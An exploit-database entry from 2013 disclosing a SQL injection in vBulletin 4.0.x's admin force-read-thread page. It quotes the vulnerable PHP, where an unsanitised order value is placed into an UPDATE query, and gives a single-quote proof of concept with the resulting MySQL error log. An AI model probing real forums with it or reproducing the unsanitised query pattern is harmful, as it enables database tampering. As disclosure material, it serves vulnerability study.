vBulletin 4.0.x SQL Injection Vulnerability

2013-07-26T00:00:00
ID 1337DAY-ID-21029
Type zdt
Reporter n/a
Modified 2013-07-26T00:00:00

Description

vBulletin version 4.0.x appears to suffer from a remote SQL injection vulnerability in the administrative functionality.

                                        
                                            # Exploit Title: vBulletin force Read Thread 0day            #
# Author(s): n3tw0rk                                         #
# Contact: Mail:[email protected]                      #
# Product: 4.0.x                                             #
# Software Version x.x.x                                     #
# Product Download:
http://www.vbulletin.org/forum/showthread.php?t=241754&page=18
    #
# Google Dork: use your mind                                 #
# Homepage: d4tabase.com                                     #
_____________________________________________________________#

The exploit is caused due to a variable named 'update_order' not being
sanitized before being used within an insert into statement.

if ($_REQUEST['do'] == 'update_order')
{
$vbulletin->input->clean_array_gpc('r', array(
'force_read_order'   => TYPE_ARRAY
));

if ($vbulletin->GPC['force_read_order'])
{
foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order)
{
$db->query_write("
UPDATE " . TABLE_PREFIX . "thread AS thread
SET force_read_order = '$order'
WHERE threadid = '$threadid'
");
}
}
  POC
 You will need Admincp Access then go to
site.com/admincp/force_read_thread.php then in the force read order colum
put a ' into one of them to show this
 Database error in vBulletin 4.2.1:

Invalid SQL:

UPDATE thread AS thread
SET force_read_order = '1''
WHERE threadid = '5161';

MySQL Error   : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'5161'' at line 2
Error Number  : 1064
Request Date  : Thursday, July 25th 2013 @ 01:20:52 AM
Error Date    : Thursday, July 25th 2013 @ 01:20:52 AM
Script        :
http://d4tabase.com/admincp/force_read_thread.php?do=update_order
Referrer      : http://d4tabase.com/admincp/force_read_thread.php
IP Address    :
Username      : n3tw0rk
Classname     :
MySQL Version :

#  0day.today [2018-04-12]  #